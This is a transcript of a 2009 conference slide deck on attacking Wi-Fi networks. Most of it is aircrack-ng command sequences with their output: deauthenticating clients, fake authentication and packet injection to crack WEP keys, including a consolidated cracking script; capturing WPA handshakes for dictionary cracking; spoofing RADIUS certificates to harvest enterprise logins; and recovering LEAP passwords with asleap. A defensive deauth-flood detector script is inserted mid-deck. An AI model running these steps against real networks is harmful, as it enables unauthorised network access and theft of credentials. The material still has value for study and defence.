Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

#barcampkl 2009

Comment from the author: lol u guys if there's any question just email me at the email inside the slide

Transcript

  • 1. Special thanks to: Milw0rm | str0ke
    Paperwork released on 24/2/2009
    AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
  • 2. Contents
    - Introduction
    - Security of Wireless Network
    - Breaking the Simple Defenses
      - MAC Filtering
      - Discover Hidden SSID
      - Sniffing Information on the Air
    - Get Closer with the Cracking Tool
      - Aircrack-ng suite
      - Decrypt packets with airdecap-ng
      - Decloak packets with airdecloak-ng
    - Owned the WEP Key with Simple Technique (No Injection)
      - Capturing method
      - Cracking method
    - Owned the WEP Key with Advanced Technique (With Inject Method)
      - Monitor Mode
      - Fake Authentication
      - ARP Replay Attack
      - Fragmentation Attack
      - Korek ChopChop Attack
      - Packetforge
      - ARP Request Replay with Interactive Attack
      - Cracking WEP key
    - Conclusion: steps for cracking WEP
    - Owned the WPA-PSK / WPA2-PSK Key
    - Exploiting Enterprise Wireless Connection (WPA-TLS/TTLS/PEAP)
    - Exploiting CISCO LEAP
    - References & Greetz to
    - About Me / Questions
  • 3. Introduction
    This presentation introduces the practical techniques hackers use to break wireless security. You need some basic knowledge of wireless operation to follow it.
  • 4. Security of Wireless Network
    (Slide lists the wireless security options: WEP, WPA-PSK, WPA2-PSK, WPA-802.1X, WPA2-802.1X)
  • 5. Breaking the Simple Defenses: Bypass MAC Filtering?
    (Cartoon: the hacker asks to connect; the access point replies "Wait wait.. Lemme check with my system first", then "Wow! You're LEGIT! You shall pass, no0b")
  • 6. Breaking the Simple Defenses: Bypass MAC Filtering
    (Cartoon: hacker and no0b, continued)
  • 7. Breaking the Simple Defenses: Discover Hidden SSID
    (Cartoon: the hacker facing the access point "Ayam Goreng", whose SSID is hidden)
  • 8. Breaking the Simple Defenses: Discover Hidden SSID
    - SSID broadcasting can be disabled in beacon frames ONLY.
    - All other management frames (probe requests/responses, association and reassociation frames) contain the SSID of the network.
    So… what I can do is:
    - Forge DISASSOCIATE frames to a station, seeming to come from the ACCESS POINT, so the station tries to reassociate (and sends the SSID).
    - Reboot a client so it reassociates when it initializes (if you have physical access to the equipment).
    - RF-jam (interfere with) a client so it tries to reassociate (and exposes the SSID).
    - Install a fake Access Point near a client with a weak signal so it tries to roam (probe requests will be sent).
  • 9. Breaking the Simple Defenses: Discover Hidden SSID
    #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0
    21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
    21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
    #airodump-ng wlan0
    (Cartoon: the hacker now sees "Ayam Goreng", no longer a hidden SSID; "OSHII--")
  • 10. Breaking the Simple Defenses: Sniffing Information on the Air
  • 11. Get Closer with the Cracking Tool: Aircrack-ng suite
    Aircrack-ng suite is a set of tools for auditing wireless networks. 4 main tools for today:
    - Airodump-ng – used for capturing packets
    - Aireplay-ng – used for injection: de-authentication, fake authentication, interactive packet replay, ARP replay, KoreK chopchop, fragment
    - Packetforge-ng – used for creating packets
    - Aircrack-ng – used for recovering keys
  • 12. Get Closer with the Cracking Tool: Decrypt packets with airdecap-ng
    For WPA, airdecap-ng will only return a successful result for a capture file which contains the four-way handshake.
  • 13. Get Closer with the Cracking Tool: Decloak packets with airdecloak-ng
    Cloaking is a technique to disturb the WEP key cracking process. It is done by injecting packets encrypted with a random WEP key into the network; these packets are called "chaff". If the attacker captures these packets and runs the cracking on them, the result will be wrong or no result will be returned. However, the aircrack team has developed a tool to deal with this technique, called "airdecloak-ng".
    #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
    This command returns two files:
    - workshop-01-filtered.cap: contains the filtered packets from the specified bssid
    - workshop-01-cloaked.cap: contains the cloaked packets from the specified bssid
  • 14. Get Closer with the Cracking Tool: Aircracking 101
    - PTW Attack (-z): aircrack-ng -z capture.cap. Only works for WEP 64/128 bits; requires the ARP request/replay packets, so you must dump all packets with airodump-ng.
    - Dictionary Attack (WPA/WPA2 passphrases): aircrack-ng -w pass.lst *.cap
    - Fudge Attack (-f): once you hit 2 million IVs, try the fudge factor with "-f 4". Retry, increasing the fudge factor by 4 each time. All the while, keep collecting data. Remember the golden rule: "The More IVs the Better".
  • 15. Pwning the WEP key
    (Cartoon: WEP – "FFFFFFFFFUUUUUUUUUUUUU--" – Hacker)
  • 16. Owned the WEP Key with Simple Technique (No Injection)
    Let's assume that the network has high traffic, so we don't need to do all that injection stuff.
    Preparation: a device which supports monitor mode and can inject packets into the network.
    MY preparation:
    - 5-year-old laptop – AMD Turion64 1.6GHz, 256MB DDR (still working harmoniously despite…)
    - Ubuntu Intrepid Ibex 8.10
    - Broadcom chipset running the legacy b43 driver.
  • 17. Owned the WEP Key with Simple Technique (No Injection): Capturing Method
    - 64-bit key – 50,000 IV packets
    - 128-bit key – 150,000 IV packets
    #airodump-ng -w workshop rausb0
    ------------------------------------------------------------------------------------------
    [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

     BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
     xx:xx:xx:xx:xx:xx   77  94    10905  11054    0  11  54.  WEP  WEP    OPN  Workshop

     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
     xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747
    ------------------------------------------------------------------------------------------
  • 18. Owned the WEP Key with Simple Technique (No Injection): Cracking Method
    #aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
    -b xx:xx:xx:xx:xx:xx is the MAC address of the target access point.
    The successful cracking result is as follows:
    ---------------------------------------------------------------
    Opening workshop-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 50417 ivs.
    KEY FOUND! [ 00:11:22:33:44 ]
    Decrypted correctly: 100%
    ---------------------------------------------------------------
  • 19. Owned the WEP Key with Advanced Technique (With Inject Method)
    Let's assume that the network has no traffic at all. The requirements for a packet chosen for injection are as follows:
    - Its source MAC address is associated with the access point (we can do this by fake authentication).
    - It is sent from a client to the access point (the "To DS" flag is set to 1).
    - Its destination MAC address is the broadcast address (FF:FF:FF:FF:FF:FF).
    The well-known packet which covers all requirements is the ARP request broadcast.
    We can divide the injection technique into 2 scenarios:
    - The network has ARP requests.
    - The network has no ARP requests.
  • 20. Owned the WEP Key with Advanced Technique (With Inject Method): Monitor mode
    Use airmon-ng to set your wifi card to Monitor Mode and prepare for packet injection.
    #airmon-ng start wlan0 11
    This sets wlan0 to Monitor mode on channel 11. We must specify the same channel as the target AP's channel.
    (Cartoon: "Troops. Prepare for assault!" – Hacker – "Affirmative" – "I Choose YOU!")
  • 21. Owned the WEP Key with Advanced Technique (With Inject Method): Fake Authentication
    We can do fake authentication with the following command:
    #aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    -a xx:xx:xx:xx:xx:xx is the MAC address of the access point
    -h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
    If we get a successful result, our MAC address will be associated with that access point.
    ------------------------------------------
    00:00:00  Sending Authentication Request
    00:00:00  Authentication successful
    00:00:00  Sending Association Request
    00:00:00  Association successful :-)
    ------------------------------------------
    After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropriate steps to deal with it.
  • 22. Owned the WEP Key with Advanced Technique (With Inject Method): ARP Replay Attack
    We can use the ARP replay attack with the following command:
    #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    -b xx:xx:xx:xx:xx:xx is the MAC address of the access point
    -h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
    Aireplay-ng will detect an ARP request and use it to perform the replay attack automatically.
    ------------------------------------------------------------------------------------
    21:06:20  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
    Saving ARP requests in replay_arp-0223-210620.cap
    You should also start airodump-ng to capture replies.
    Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
    ------------------------------------------------------------------------------------
  • 23. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    The fragmentation attack is used to obtain a keystream of 1500 bytes, so we can use this keystream to create a packet of up to 1500 bytes. The command for the fragmentation attack is:
    #aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
  • 24. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    The system responds with this:
    -------------------------------------------------------------------------------
    21:21:07  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
    21:21:07  Waiting for a data packet...

            Size: 90, FromDS: 1, ToDS: 0 (WEP)

                  BSSID  =  00:1B:2F:3D:CB:D6
              Dest. MAC  =  00:1A:73:37:E2:A3
             Source MAC  =  00:1B:2F:3D:CB:D6

            0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
            0x0010:  001b 2f3d cbd6 20df 0000 b168 ff00 2872  ../=.. ....h..(r
            0x0020:  7547 d03f 70d7 2d29 1397 7d3d ac16 382a  uG.?p.-)..}=..8*
            0x0030:  f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263  ..w..c.....(...c
            0x0040:  5315 a328 87cb 0d4a b36a e5be 93c7 307a  S..(...J.j....0z
            0x0050:  7bc2 18d7 2df5 94f2 5aed                 {...-...Z.

    Use this packet ?
    -------------------------------------------------------------------------------
  • 25. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    We just have to answer yes:
    -----------------------
    Use this packet ? y
    -----------------------
    And the successful process looks like this:
    ----------------------------------------------------------------------------------
    Saving chosen packet in replay_src-0223-212107.cap
    Data packet found!
    Sending fragmented packet
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 384 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 1500 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Saving keystream in fragment-0223-212107.xor
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
    ----------------------------------------------------------------------------------
  • 26. Owned the WEP Key with Advanced Technique (With Inject Method): Korek ChopChop Attack
    We can use the chopchop attack with this command:
    #aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    Aireplay-ng will pick a packet for decrypting. We should choose any packet whose BSSID matches our target.
    --------------------------------------------------------------------------------------
    21:12:42  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11

            Size: 90, FromDS: 1, ToDS: 0 (WEP)

                  BSSID  =  00:1B:2F:3D:CB:D6
              Dest. MAC  =  00:1A:73:37:E2:A3
             Source MAC  =  00:1B:2F:3D:CB:D6

            0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
            0x0010:  001b 2f3d cbd6 6084 0000 55bc e600 2e4e  ../=..`...U....N
            0x0020:  a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0  .4...L..,..H.'..
            0x0030:  767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0  v}'%..b.%..K....
            0x0040:  bb3f 4874 c821 c402 467d f70f 2a56 43a7  .?Ht.!..F}..*VC.
            0x0050:  b09b f0f1 8b04 fc1c 0b72                 .........r

    Use this packet ?
    --------------------------------------------------------------------------------------
  • 27. Owned the WEP Key with Advanced Technique (With Inject Method): Korek ChopChop Attack
    Just answer yes:
    -----------------------
    Use this packet ? y
    -----------------------
    And then the system will do the decrypting:
    ---------------------------------------------------------------------------------------
    Saving chosen packet in replay_src-0223-211242.cap
    Offset   87 ( 3% done) | xor = 4E | pt = 3C |   64 frames written in  1097ms
    Offset   86 ( 5% done) | xor = 16 | pt = 1D |  119 frames written in  2029ms
    Offset   85 ( 7% done) | xor = 63 | pt = 7F |  146 frames written in  2476ms
    Offset   84 ( 8% done) | xor = 97 | pt = 6B |  239 frames written in  4068ms
    Offset   83 (10% done) | xor = 0E | pt = 0A |  228 frames written in  3865ms
    Offset   82 (12% done) | xor = 86 | pt = 0D |  273 frames written in  4646ms
    And so on ...
    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    Saving plaintext in replay_dec-0223-211410.cap
    Saving keystream in replay_dec-0223-211410.xor
    Completed in 21s (2.48 bytes/s)
    ---------------------------------------------------------------------------------------
  • 28. Owned the WEP Key with Advanced Technique (With Inject Method): Packetforge
    Packetforge-ng creates an encrypted packet from the PRGA (XOR file) obtained from the chopchop or fragmentation attack.
    #packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp
    The result is:
    ----------------------
    Wrote packet to: arp
    ----------------------
    From this command, we get an ARP request packet in a file named "arp".
  • 29. Owned the WEP Key with Advanced Technique (With Inject Method): ARP Request Replay with Interactive Attack
    We use aireplay-ng to inject the ARP request packet to the access point with the following command:
    #aireplay-ng -2 -r arp rausb0
    And…
    -----------------------------------------------------------------------------------
            Size: 68, FromDS: 0, ToDS: 1 (WEP)

                  BSSID  =  00:1B:2F:3D:CB:D6
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:21:27:C0:07:71

            0x0000:  0841 0201 001b 2f3d cbd6 0021 27c0 0771  .A..../=...!'..q
            0x0010:  ffff ffff ffff 8001 55bc e600 2e4e a334  ........U....N.4
            0x0020:  a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b  ...J..$.&.O&..l;
            0x0030:  ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e  .z*6].%,...dc-S~
            0x0040:  66bf 700e                                f.p.

    Use this packet ?
    -----------------------------------------------------------------------------------
  • 30. Owned the WEP Key with Advanced Technique (With Inject Method): ARP Request Replay with Interactive Attack
    Yes is the only option available:
    -----------------------
    Use this packet ? y
    -----------------------
    Now aireplay-ng starts injecting the packets:
    -------------------------------------------------------
    Saving chosen packet in replay_src-0223-211755.cap
    You should also start airodump-ng to capture replies.
    Sent 1200 packets...(499 pps)
    -------------------------------------------------------
    And don't forget to start airodump-ng.
  • 31. Owned the WEP Key with Advanced Technique (With Inject Method): Cracking WEP Key
    #aircrack-ng -z capture1.cap   (PTW Attack)
    The successful cracking result is as follows:
    ---------------------------------------------------------------
    Opening capture1.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 50417 ivs.
    KEY FOUND! [ 00:11:22:33:44 ]
    Decrypted correctly: 100%
    ---------------------------------------------------------------
  • 32. Conclusion: Scripts for Cracking WEP
    $AP is the Access Point MAC address; $WIFI is the Wi-Fi card MAC address.
    airmon-ng start wlan0 11                    (must specify the channel for Monitor Mode)
    airodump-ng -c 11 -w capture1.cap wlan0
    aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
    aireplay-ng -4 -b $AP -h $WIFI wlan0
    If it's not working, try: aireplay-ng -5 -b $AP -h $WIFI wlan0
    packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp
    aireplay-ng -2 -r arp wlan0
    aircrack-ng -z capture1.cap
  • 33. Owned the WPA-PSK/WPA2-PSK Key
    The idea for cracking the pre-shared key is to gather the four-way handshake packets.
  • 34. Owned the WPA-PSK/WPA2-PSK Key
    We are able to do this by de-authenticating an associated client. This forces the client to re-authenticate, and we can capture the four-way handshake from that process. The command for de-authentication is:
    #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
    21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
    21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
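Seen from the defender's side, the directed deauthentication burst used here and on the hidden-SSID slide is the most visible part of both techniques: a monitor-mode sensor sees dozens of deauth frames to one station within a second, where normal operation produces only the occasional one. The following Python script is an added example, not code from the presentation or from the aircrack-ng project, of that detection logic run over a constructed management-frame log. The frame tuples, the MAC addresses (reusing the slide's xx/yy/zz placeholders), the 20-frames-in-2-seconds threshold and the function names are all assumptions for illustration.

```python
"""Deauthentication-flood detector over a constructed 802.11 management-frame log.

Added example, not code from the presentation or from aircrack-ng. The frame
tuples, the MAC addresses and the thresholds are constructed for illustration.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, Iterable, List, Tuple

# One record per management frame a monitor-mode sensor saw:
# (time in seconds, frame subtype, transmitter address, receiver address).
Frame = Tuple[float, str, str, str]

# Constructed sample feed: a few beacons, one isolated deauth such as an idle
# timeout produces, then a burst of 64 directed deauths in under a second, which
# is what "Sending 64 directed DeAuth" on the slide looks like from the air.
SAMPLE_FRAMES: List[Frame] = (
    [(0.0, "beacon", "xx:xx:xx:xx:xx:xx", "ff:ff:ff:ff:ff:ff"),
     (0.1, "beacon", "xx:xx:xx:xx:xx:xx", "ff:ff:ff:ff:ff:ff"),
     (5.0, "deauth", "xx:xx:xx:xx:xx:xx", "yy:yy:yy:yy:yy:yy")]
    + [(10.0 + i * 0.015, "deauth", "xx:xx:xx:xx:xx:xx", "zz:zz:zz:zz:zz:zz")
       for i in range(64)]
    + [(12.0, "beacon", "xx:xx:xx:xx:xx:xx", "ff:ff:ff:ff:ff:ff")]
)

# Subtypes that tear down a client's session; both are unauthenticated unless
# 802.11w Protected Management Frames is in use.
DISCONNECT_SUBTYPES = frozenset({"deauth", "disassoc"})


@dataclass(frozen=True)
class Alert:
    bssid: str         # address the frames claim to come from
    station: str       # client being kicked off
    first_seen: float  # start of the busiest window
    count: int         # frames inside that window


def detect_deauth_floods(frames: Iterable[Frame],
                         threshold: int = 20,
                         window: float = 2.0) -> List[Alert]:
    """Flag every (bssid, station) pair that receives at least `threshold`
    deauth/disassoc frames inside a sliding window of `window` seconds.
    One alert per pair, recording the window with the highest count."""
    recent: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)
    alerts: Dict[Tuple[str, str], Alert] = {}
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        key = (src, dst)
        times = recent[key]
        times.append(ts)
        # drop timestamps that fell out of the window (ts itself always stays)
        while ts - times[0] > window:
            times.popleft()
        if len(times) >= threshold:
            best = alerts.get(key)
            if best is None or len(times) > best.count:
                alerts[key] = Alert(src, dst, times[0], len(times))
    return list(alerts.values())


def format_alerts(alerts: List[Alert]) -> List[str]:
    """Human-readable lines for a SOC console or syslog."""
    return [f"DEAUTH FLOOD bssid={a.bssid} station={a.station} "
            f"count={a.count} from t={a.first_seen:.3f}s" for a in alerts]


if __name__ == "__main__":
    for line in format_alerts(detect_deauth_floods(SAMPLE_FRAMES)):
        print(line)
```

Any wireless IDS feed that yields timestamped management frames with their addresses can replace SAMPLE_FRAMES; the single deauth to yy:yy:yy:yy:yy:yy stays below the threshold while the 64-frame burst to zz:zz:zz:zz:zz:zz raises one alert. The threshold is a constructed starting point and should be tuned against the baseline of your own WLAN. Detection is only a compensating control: 802.11w Protected Management Frames authenticates deauthentication and disassociation frames, so where clients and access points support it the spoofed deauth itself is rejected.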
  • 35. Owned the WPA-PSK/WPA2-PSK Key
    #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
    Opening test-02.cap
    Read 252 packets.

       #  BSSID              ESSID      Encryption
       1  xx:xx:xx:xx:xx:xx  Workshop   WPA (1 handshake)

    Choosing first network as target.
    Opening workshop-02.cap
    Reading packets, please wait...

                                  Aircrack-ng 1.0 rc1 r1085

                    [00:00:00] 0 keys tested (0.00 k/s)

                          KEY FOUND! [ TheFuckinWPAKey ]

        Master Key     : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
                         E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

        Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
                         61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
                         9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
                         2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

        EAPOL HMAC     : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
  • 36. Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
    Most companies have turned to public key encryption for their wireless networks and think it is perfectly safe. But the tricky hacker still attacks this system by spoofing the certificate. This attack method takes advantage of client incaution: many clients accept a certificate without considering whether it is genuine or not. This lets the attacker impersonate the RADIUS server and capture login credentials from victims.
    We can use freeradius as a fake RADIUS server combined with the WPE patch to log login credential information on the freeradius server.
    Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
  • 37. Exploiting CISCO LEAP
    Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible authentication protocol (EAP) types specified by 802.1X.
    We found that the usernames sent to RADIUS are plaintext (captured with Wireshark), but the password was encrypted. So it's also vulnerable to exploit… (insert evil
  • 38. Exploiting CISCO LEAP
    asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:
    - Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
    - Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery) – AIRJACK DRIVER REQUIRED
    Download here: http://asleap.sourceforge.net/
  • 39. Exploiting CISCO LEAP
    First step: use asleap's genkeys to produce the necessary database (.dat) and index (.idx) files.
    #./genkeys -r dictionary -f dict.dat -n dict.idx
    dictionary = our wordlist/dictionary file, with one word per line
    dict.dat = our new output pass+hash file (generated as a result of running this command)
    dict.idx = our new output index file (generated as a result of running this command)
    -----------------------------------------------------------------------
    genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
    Generating hashes for passwords (this may take some time) ...Done.
    3 hashes written in 0.2 seconds: 122.67 hashes/second
    Starting sort (be patient) ...Done.
    Completed sort in 0 compares.
    Creating index file (almost finished) ...Done.
    -----------------------------------------------------------------------
  • 40. Exploiting CISCO LEAP
    The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:
    #./asleap -r data/leap.dump -f dict.dat -n dict.idx
    leap.dump = our libpcap packet capture file (NOTE: any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
    dict.dat = our pass+hash file (generated with genkeys, see above)
    dict.idx = our index file (generated with genkeys, see above)
  • 41. Exploiting CISCO LEAP
    So… what are we waiting for?
    #./asleap -r data/leap.dump -f dict.dat -n dict.idx
    -----------------------------------------------------------------------
    asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Using the passive attack method.
    Captured LEAP exchange information:
            username:          qa_leap
            challenge:         0786aea0215bc30a
            response:          7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
            hash bytes:        4a39
            NT hash:           a1fc198bdbf5833a56fb40cdd1a64a39
            password:          qaleap
    Closing pcap ...
    -----------------------------------------------------------------------
    asleap 2.2 now includes the "-C" and "-R" options to specify the hex-delimited bytes for the challenge and the response (respectively). Using these options, asleap becomes a generic MS-CHAPv2 cracking tool and can be applied any time you have an MS-CHAPv2 packet capture available.
  • 42. References & Greetz to
    - PaulDotCom Forum
    - http://www.darkoperator.com/scripts
    - http://trac.metasploit.com/wiki/Karmetasploit
    - http://aircrack-ng.org/doku.php
    - http://www.citec.us
    - http://www.milw0rm.com
    Greetz to the CWH Underground team: ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
    Special Thx: asylu3, str0ke, citec.us, milw0rm.com
  • 43. About Me / Questions
    I'm Siddiq, 19.
    Currently pursuing a Degree in Biochemistry at Technology Park Malaysia College.
    A retarded lazy part-time web programmer @ I-don't-know-anything-about-IT
    Currently looking for a real part-time job.
    mysiddiq@gmail.com
    Thanks for attending. Questions?